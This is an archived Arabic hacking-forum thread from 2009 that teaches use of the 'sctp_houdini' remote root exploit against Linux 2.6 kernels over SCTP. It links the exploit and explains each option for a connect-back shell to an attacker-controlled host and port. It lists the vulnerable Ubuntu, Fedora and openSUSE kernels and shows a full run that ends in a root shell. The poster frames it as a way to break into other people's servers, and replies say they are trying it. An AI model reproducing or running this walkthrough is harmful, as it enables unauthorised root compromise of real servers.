:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   2.6 sctp_houdini ريموت جديد ! شــرح (http://www.vbspiders.com/vb/t13816.html)

Spiral 06-26-2009 05:52 PM

2.6 sctp_houdini ريموت جديد ! شــرح
 
1 مرفق
الســــلام عليكم شباب ..

اليوم نزل ريموت جديد للإصدار المصاب 2.6.x وبصراحة الظاهر قوي جدا .. ولاكن الترجمة شوية غلبتني وإن شاء الله بنزله خلال كم ساعه بلكثير ...

Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
كود:

http://www.milw0rm.org/exploits/8556
اللحين لنعرف كيف الريموت هذا يشتغل وعلى اي كيرنل بلضبط .. طبعا الشرح حصري شباب وخافوا الله بلسيرفرات العربية ... والله ماشرحت الطريقة الا لكم صديق ولنشر الطريقة لانها مو حصرية بس شوية تركيز تحتاج .. الريموت مو حصري ولاكن حاليا لن يتم نشره حتى إشعار اخر ..

نبتدي علبركة ..

كود:

[r1z@0wnEd ]# ./2.6.x-remote
./sctp_houdini
        -H lhost  (local host address for connect back shel)
        -P lport  (local port address for connect back shell)
        -h rhost  (remote target host)
        -p rport  (remote target port)
        -t kernel  (target kernel)
        -s sport  (source port defining sctp association where corruption occurs)
                  (always use higher port if you run the exploit multiple times eg. 20000, 21000, etc..)
                  (NEVER reuse the same or next port or vsys will be trashed and init will die soon...)
        -c conn    (number of connectionis before corruption - default 600)
[root@vps9224 html]# ./2.6-r -H 72.167.131.130 -P 5555 -h 72.167.131.130 -p 20000 -s 15000 -c 700 -t 2.4.21-53.ELsmp
Unable to find target: 2.6.24-19-xen
Available targets are:
- ubuntu64_faisty-2.6.20-[15-17]-generic  (faisty: generic kernel)
- ubuntu64_faisty-2.6.20-17-server  (faisty: server kernel - last 2.6.20-17 build)
- ubuntu64_hardy-2.6.24-[18-21]-generic  (kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)
- ubuntu64_hardy_2.6.24-[16-18]-server  (kernel from 2.6.24-16 to 2.6.24-18 -- server)
- ubuntu64_hardy-2.6.24-[19-22]-server  (kernel from 2.6.24-19 to 2.6.24-22 -- server)
- ubuntu64_hardy-2.6.24-23-last-server  (last 2.6.24-23 kernel before patch -- server)
- ubuntu64_intrepid-2.6.27-7-server  (kernel 2.6.27-7 -- server)
- ubuntu64_intrepid-2.6.27-[9-last]-server  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- ubuntu64_intrepid-2.6.27-[7-last]-generic  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- fedora64_10-2.6.25-117  (fedora core 10 default installed kernel)
- opensuse64_11.1-2.6.27.7-9-default  (opensuse 11.1 default installed kernel)
[r1z@0wnEd ]#

طيب اللحين اكيد المعظم يقول سهل التطبيق ؟ والمعظم ماهو فاهم شي .. لنشوف الشرح هاذ

كود:

-H lhostl
هذا الخيار من سيرفرك الي تخترق منه .. يعني لو سيرفر له الايبي

كود:

127.0.0.1
نحطه محل الايبي الي نبي نخترقه bOx ip

كود:

-P lport
هاذ البورت لازم يكون فاتح بسيرفرك ليتصل عليه سيرفر الضحية بعد الإكسبلويت مايتم
والي هو

كود:

5555
كود:

-h rhost
هو ايبي الضحية ( سيرفر الضحية ) نحط الايبي له وليكن

كود:

192.168.1.1
بورت الإتصال العكسي على سيرفر الضحية وليكن

كود:

20000
كود:

-t kernel
كيرنل الضحية بنجيبه بلامر هذا

كود:

uname -r
محتوى الامر هذا نكتبه والانواع المصابه بهذا الريموت هم

كود:

- ubuntu64_faisty-2.6.20-[15-17]-generic  (faisty: generic kernel)
- ubuntu64_faisty-2.6.20-17-server  (faisty: server kernel - last 2.6.20-17 build)
- ubuntu64_hardy-2.6.24-[18-21]-generic  (kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)
- ubuntu64_hardy_2.6.24-[16-18]-server  (kernel from 2.6.24-16 to 2.6.24-18 -- server)
- ubuntu64_hardy-2.6.24-[19-22]-server  (kernel from 2.6.24-19 to 2.6.24-22 -- server)
- ubuntu64_hardy-2.6.24-23-last-server  (last 2.6.24-23 kernel before patch -- server)
- ubuntu64_intrepid-2.6.27-7-server  (kernel 2.6.27-7 -- server)
- ubuntu64_intrepid-2.6.27-[9-last]-server  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- ubuntu64_intrepid-2.6.27-[7-last]-generic  (kernel 2.6.27-9 to the last unpatched kernel -- server)
- fedora64_10-2.6.25-117  (fedora core 10 default installed kernel)
- opensuse64_11.1-2.6.27.7-9-default  (opensuse 11.1 default installed kernel)

كود:

-s sport
بورت الاتصال لبرنامج SCTP الي هو اختصار ل

كود:

Stream Control Transmission Protocol (SCTP)
ولو كانلك شل على سيرفر المخترق نطبق الامر هذا لنشوف اذا السيرفر يحتوي على البرنامج ام لا
كود:

[r1z@0wnEd ]# locate sctp | grep `uname -r`
/lib/modules/2.6.24-19-xen/kernel/net/sctp
/lib/modules/2.6.24-19-xen/kernel/net/netfilter/nf_conntrack_proto_sctp.ko
/lib/modules/2.6.24-19-xen/kernel/net/netfilter/xt_sctp.ko
/lib/modules/2.6.24-19-xen/kernel/net/sctp/sctp.ko
[r1z@0wnEd ]#

كود:

-c conn
هذا الخيار للحجم الباكيت ( الإتصال ) بسيرفر الضحية والاغلب يكون 600 وتقدروا تحطوا رقم اكبر منه مثل 700 - 800

وبلنهاية

كود:

[r1z@0wnEd ]#./2.6.x-remote -H 127.0.0.1 -P 5555 -h 192.168.1.1 -p 20000 -s 15000 -c 600 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0


[r1z@0wnEd ]#GAME OVER

* ملاحظة ...
قبل لاتروتوا اي سيرفر تاكدوا ان السيرفر الي انتوا عليه او جهازك يتنصت على بورت 5555 للإتصال العكسي من جهاز الضحية ..


الريموت مترجم والباس

www.sec-r1z.com

ياليت الي ينشر الموضوع شباب يحفظ الحقوق

SecurityRules
www.sec-r1z.com


منقووول

brnce 09-21-2009 01:08 AM

مشكور بارك الله فيك وجاري التجربة

KaLa$nikoV 09-21-2009 01:45 PM

مشكور على النقل

zaky092 09-29-2009 01:33 AM

بارك الله فيك

zaky092 09-29-2009 01:33 AM

بارك الله فيك


الساعة الآن 09:49 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0